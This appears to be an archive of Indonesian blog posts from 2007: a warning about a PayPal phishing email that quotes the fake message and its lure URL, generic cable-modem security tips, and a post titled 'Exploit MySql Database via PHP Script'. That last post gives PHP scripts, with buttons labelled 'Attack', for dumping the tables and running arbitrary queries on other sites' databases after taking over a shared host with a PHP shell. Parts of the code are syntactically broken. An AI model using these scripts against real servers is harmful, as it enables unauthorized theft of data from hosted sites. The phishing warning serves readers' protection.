13 February 2007
Hati hati penipuan atas nama paypal
alamat pengirim.
kebetulan beberapa waktu lalu saya melakukan registrasi di pay pal, namun sudah ada
confirmasi kalo gagal melakukan registrasi, dan tiba2 masuk email tersebut, tentunya saya
cukup girang he he
tapi saya terdiam dan berpikir , kok email dari paypal gak ada alamat pengirimnya
dan saya di kasih link untuk melakukan login ke paipal namun linknya tidak di tampilkan
hanya tulisan yang harus di klik ("simply sign on from Account Services to Restore Your
Account . "),
dan saya coba copy link location dan saya paste ke address bar link tersebut menuju ke :
"http://zmfhiv.s7.vhost.hu/www.paypal.com/cgi-bin/webscrcmd=_login-run//index.php"
sedangkan kita tau alamat url asli pay pal khan www.paypal.com
tampilannya 99,99% mirip persis ama paypal
sampai semua linknya,
saya masih gak percaya dan iseng iseng buka www.paypal.com, ternyata bener bener sama
halamannya tapi kok url nya beda...
setelah lama mengamati wow akhirnya ketemu perbedaan yaitu di paypal palsu gak ada "Security
Center" dan link loginnya beda..
akhirnya saya memutuskan utuk tidak melakukan login ke paypal palsu tersebut, syukur deh
hampir aja kena tipu ama bule gile wekekekeke
bagi temen temen yang menerima email yang sama seperti saya harap jangan coba coba login ke
alamat tersebut karena
1 : bisa bisa duit anda di paypal di rampok habis
2 : seandainya anda gak punya dit di sana, terpaksa email anda di curi, dan bisa di bayangkan data2 penting di email di gasak habis
berikut adalah isi email dari paypal palsu " semoga bermanfaat"
(pengirim tidak dikenal)
kepada saya
Lihat pilihan yang tersedia 01:37 (1 jam yang lalu)
From: "PayPal" Reply-To: "PayPal"
�
Dear Customer,
As part of our security measures, we regularly screen activity in the PayPal system. We
recently contacted you after noticing an issue on your account.We requested information from
you for the following reason: .
Our system requires further account verification.
Case ID Number: xx-xxx-xxx-xxx
Be sure to log in securely by clicking this link. Once you log in, you will be provided with
steps to restore your account access. We appreciate your understanding as we work to ensure
account safety.
simply sign on from Account Services to Restore Your Account .
In accordance with PayPal's User Agreement, your account access will remain limited until
the issue has been resolved. Unfortunately, if access to your account remains limited for an
extended period of time, it may result in further limitations or eventual account closure.
We encourage you to log in to your PayPal account as soon as possible to help avoid this.
To review your account and some or all of the information that PayPal used to make its
decision to limit your account access, please visit the Resolution Center. If, after
reviewing your account information, you seek further clarification regarding your account
access, please contact PayPal by visiting the Help Center and clicking "Contact Us".
We thank you for your prompt attention to this matter. Please understand that this is a
security measure intended to help protect you and your account. We apologize for any
inconvenience.
Sincerely,
PayPal Account Review Department
--------------------------------------------------------------------------------------------
----
PayPal Email ID xxxxx
22 January 2007
Security Tips for Intranet Connection Via Cable Modem ..always on..

Rekan rekan ...
Ada tips penting sebaiknya disebarkan pada karyawan atau relasi anda apalagi kalau anda menggunakan intranet dan windows based client.
tadi sore duduk duduk sambil minum kopi, hmm sambil mikir mikir, penggunaan internet yang pesat banget, dan sempat terpikirkan dampaknya bagi pengguna awam yang tidak memikirkan keamanan data di komputer dia dan dampak lain lain, apalagi skarang siapa saja bisa mengakses internet dari rumah, di mobil, bahkan di cave cave dengan cara yang sangat mudah tinggal plug and play :D
bukan hanya masalah keamanan data, tapi resiko terinveksi virus yang bisa berakibat fatal banget, so apa yang harus di persiapkan agar hal hal tadi bisa di atasi..
intranet dan windows based client juga sangat rentan jika anda menggunakan cable modem, karena IP dari intranet anda dapat lebih mudah dilihat dari jaringan internet sehingga tetangga anda atau kantor disebelah anda sebetulnya dapat juga mengakses property dari IT yang ada dalam internet, apalagi jika tidak dilengkapi dengan firewall.
akhirnya selesai minum kopi sambil ngobrol ngobrol ama temen, mulai deh coba coba surving sambil baca baca berita dengan bantuan om google akhirnya saya temukan tulisan yang cukup bagus untuk di jadikan solusi dari sodara : Rudy Rusdiah
Nah tips yang penting bagi teman teman yang memakai jaringan cable...atau leaseline yang terconnect 24 jam keinternet..memang suatu kemajuan dan blessing bahwa kita memasuki era BROADBAND and Always ON.... computing whenever you are whereever you are...kayak iklan coca cola...begitu..
Tapi selain blessing ada juga mala petakanya...yaitu jika ada virus sudah penetrasi kedalam jaringan intranet anda...maka virus ini akan berusaha replicate dan menyebarkan virus tsb melalui address book yang ada dalam computer anda...dan biasanya waktu anda meninggalkan komputer dalam keadaan hidup dan aktif terhubung kejaringan intranet dan internet(untrusted public network) melalui cable modem misalnya.
Jadi tips yang paling nomor satu penting bagi yang memakai cable modem...:
1. Segera matikan komputer anda jika tidak terpakai apalagi jika anda menggunakan cable atau jaringan intranet yang terhubung keinternet... Memang kalau hanya melihat faktor teknis...malah membiarkan komputer
menyala terus menerus tanpa dinyalamatikan membuat lifetime computer menjadi lebih lama(jika sirkuasi udara dan suhu udara memenuhi syarat pabrik) ....tapi dengan adanya virus, backdoor dan lain lainnya...sebaiknya komputer dimatikan saja kalau tidak dipakai.
2. Perhatikan address book anda...terutama diOutlook..karena ini sasaran empuk bagi virus untuk dipakai sebagai daftar alamat untuk melakukan replikasi dan beranak pinak... Note: maunya sih mengatakan sebaiknya pakai program email yang lain misalnya Eudora dan jangan dijadikan default email...sehingga tidak mudah bagi virus untuk mendetect address book anda... kalau perlu pakai Linux...meskipun tentu tidak ada sistim didunia yang 100% safe kaerena akhirnya semua adalah buatan manusia...sehingga pasti ada kelemahannya , meskipun bagaimana hebatnya sebuah sistim.
3. Yah tentu pasang antivirus kalau pakai Windows...sedangkan kalau pakai Linux kayaknya kok belum populer antivirus untuk linux :-)
4. Pasang firewall untuk blok IP address pasang mail server di demiliterized zone(DMZ istilah computer security)..atau zona antara trusted public network dengan trusted network diintranet anda. Memang sulitnya virus masuk sebagai attachment biasa dan menyerang trusted network dari dalam bukan dari luar
5. Semoga bermanfaat ("maaf sebagian tulisan terpaksa di buang karena berbau iklan he he he, padahal sebenarnya bagus juga, lupakan saja karena akan membuat anda penasaran :d ")
artikel bisa juga di baca di : http://www.apwkomitel.org
Mohon ditambahkan tips tips yang lain...jika rekan rekan memilikinya.
21 January 2007
Google Hack (hacking dengan memanfaatkan kemampuan google)
20 January 2007
Exploit MySql Database via PHP Script

Tulisan ini saya buat, karena kebingungan saya untuk melihat database (semuanya...mulai dari nama table, field sampai dengan isinya)..
setelah saya berhasil masuk kedalam server hostingan (dengan menggunakan php shell).
Jadi langsung saja kita mulai:
langkah 1
Script yang saya buat terdiri dari 2 buah file:
1.admindb.php
2.adminatedb.php
sebelumnya karena saya pemula maka file ini script ini sangat sederhana....dan masih dapat dimodifikasi lagi
Langkah2:
1. Dapatkan file konfigurasi database dari tiap situs dalam server (gunakan php shell untuk browsing)
2. Setelah dapat maka kita hanya tinggal memasukkan nama DB, username, password dan server(default localhost)
3. jalankan file admindb.php
admindb.php
<?php if(!$submit) {
echo "Lihat Database";
echo "<form name=\"form1\" method=\"post\" action=\"\">
<table width=\"325\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><tr>
<td width=\"150\">Masukkan database</td>
<td width=\"4\">:</td>
<td width=\"170\"><input name=\"db\" type=\"text\" id=\"db\"></td>
</tr>
<tr>
<td width=\"150\">Masukkan username</td>
<td width=\"4\">:</td>
<td width=\"170\"><input name=\"user\" type=\"text\" id=\"user\"></td>
</tr>
<tr>
<td width=\"150\">Masukkan nama server</td>
<td width=\"4\">:</td>
<td width=\"170\"><input name=\"server\" type=\"text\" id=\"server\"
value=\"localhost\"></td>
</tr>
<tr>
<td width=\"150\">Masukkan password</td>
<td width=\"4\">:</td>
<td width=\"170\"><input name=\"password\" type=\"text\"
id=\"password\"></td>
</tr>
<tr>
<td></td>
<td></td>
<td><input name=\"submit\" type=\"submit\" id=\"submit\"
value=\"Attack\"></td>
</tr>
</table>
</form> ";
}
{mysql_connect($server,"$user", "$password");
$hasil=mysql_db_query($db, "show tables from $db");
$isi=mysql_num_rows($hasil);
while($isi1=mysql_fetch_row($hasil)){
for($jml=0;$jml<$isi;$jml++){
$isi2.="$isi1[$jml]\n";
}
echo "$isi2";
echo "<br><br><a href=admindb.php>kembali</a>";
echo "<br><a href=adminatedb.php?proses=0&db=$db&server=$server&user=$user&password=$password>lihat
field</a>";
echo "<br><a
href=adminatedb.php?proses=1&db=$db&server=$server&user=$user&password=$password>isi
field</a>";
echo "<br><a
href=adminatedb.php?proses=2&db=$db&server=$server&user=$user&password=$password>query
table</a>";
adminatedb.php
switch($proses){
case'0':{
if(!$submit) {
echo "Lihat field Table pada $db";
echo "<form name=\"form1\" method=\"post\" action=\"\">
<table width=\"325\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<td width=\"150\">Masukkan table</td>
<td width=\"4\">:</td>
<td width=\"170\"><input name=\"table\" type=\"text\" id=\"table\"></td>
</tr>
<tr>
<td></td>
<td></td>
<td><input name=\"submit\" type=\"submit\" id=\"submit\"
value=\"Attack\"></td>
</tr>
</table>
</form> ";
}
else
{ mysql_connect($server,"$user", "$password");
$hasil=mysql_db_query($db, "show fields from $table");
$isi=mysql_num_rows($hasil);
while($isi1=mysql_fetch_row($hasil)){
for($jml=0;$jml<$isi;$jml++){
$isi2.="$isi1[$jml]\n";
}
}
echo "field-field table $table<br><br>";
echo "$isi2";
echo "<br><br><a href=admindb.php>kembali</a>";
echo "<br><a href=adminatedb.php?proses=1&db=$db&server=$server&user=$user&password=$password>kembali
table</a>";
}
break;
if(!$submit) {
echo "Lihat Isi Table pada $db";
echo "<form name=\"form1\" method=\"post\" action=\"\">
<table width=\"325\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<td width=\"150\">Masukkan table</td>
<td width=\"4\">:</td>
<td width=\"170\"><input name=\"table\" type=\"text\" id=\"table\"></td>
</tr>
<tr>
<td></td>
<td></td>
<td><input name=\"submit\" type=\"submit\" id=\"submit\" value=\"Attack\"></td>
</tr>
</table>
</form> ";
}
else{
mysql_connect($server,"$user", "$password");
$parameter=mysql_db_query($db, "show fields from $table");
$hasil=mysql_db_query($db, "select * from $table");
$isi=mysql_num_rows($parameter);
while($isi1=mysql_fetch_row($hasil))
{for($jml=0;$jml<$isi;$jml++)
{$isi2.="$isi1[$jml]\n";
}
}
echo "isi table $table<br><br>";
echo "$isi2";
echo "<br><br><a href=admindb.php>kembali</a>";
}
break;
}
case'2':{
mysql_connect(localhost,"", "");
if($submit) {
//$pass=md5($password);
$hasil =mysql_db_query($db, "$query");
if($hasil){
echo "Serangan Berhasil";
}
else {
echo "Serangan gagal";
}
}
else {
echo "<form name=\"form1\" method=\"post\" action=\"\">
<table width=\"233\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<td width=\"59\">query</td>
<td width=\"4\">:</td>
<td width=\"170\"><textarea name=\"query\" rows=\"5\" id=\"query\"></textarea></td>
</tr>
<tr>
<td></td>
<td>:</td>
<td><input name=\"submit\" type=\"submit\" id=\"submit\"></td>
</tr>
</table>
</form>";
}
}
break;
}
?>
4. Selamat browsing isi database yah....
Perhatian ... teknik ini berfungsi saat kita sudah dapat masuk ke
server tersebut dan dapat mengupload file2 tersebut
http://groups.google.com/group/jogjahacking/browse_thread/thread/51b5d6e388ad0b37/#
